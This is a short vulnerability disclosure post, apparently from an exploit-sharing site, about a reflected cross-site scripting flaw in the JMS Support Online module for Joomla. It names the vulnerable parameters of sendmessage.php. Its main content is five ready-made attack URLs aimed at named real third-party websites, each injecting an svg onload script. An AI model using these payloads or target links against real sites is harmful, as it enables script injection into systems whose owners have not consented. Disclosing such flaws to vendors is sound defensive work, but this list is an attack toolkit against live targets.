facebook facebook twitter rss

JMS Support Online Module XSS

Author: Rednofozi , Published: 20-07-2018

# From Title : JMS Support Online Module XSS
# by rednofozi
# Tested on: Windows7, and many variations of linux.
# Vendor Homepage: iran-cyber.net
# Discovered by: rednofozi
Title: JMS Support Online Module XSS
Developers: Joommasters
App Version: 2.0
Joomla Version: Joomla 3.1
Vuln: sendmessage.php?type=skype&user=<HERE>&skype=<HERE>
Example List \/
Example 1: https://www.webgobe.com/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=%3Csvg/onload=alert(document.domain)%3E
Example 2: https://www.ngocminhstone.com/ngocminhstone/vn/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=<svg/onload=alert(document.domain)>
Example 3: https://www.morfey-logistics.com/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=<svg/onload=alert(document.domain)>
Example 4: https://www.e-911.ru/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=<svg/onload=alert(document.domain)>
Example 5: https://www.hfy.eu.com/modules/mod_jms_support/sendmessage.php?type=skype&user=User&skype=<svg/onload=alert(document.domain)>
Example End /\
# Discovered by: rednofozi

Like us on Facebook :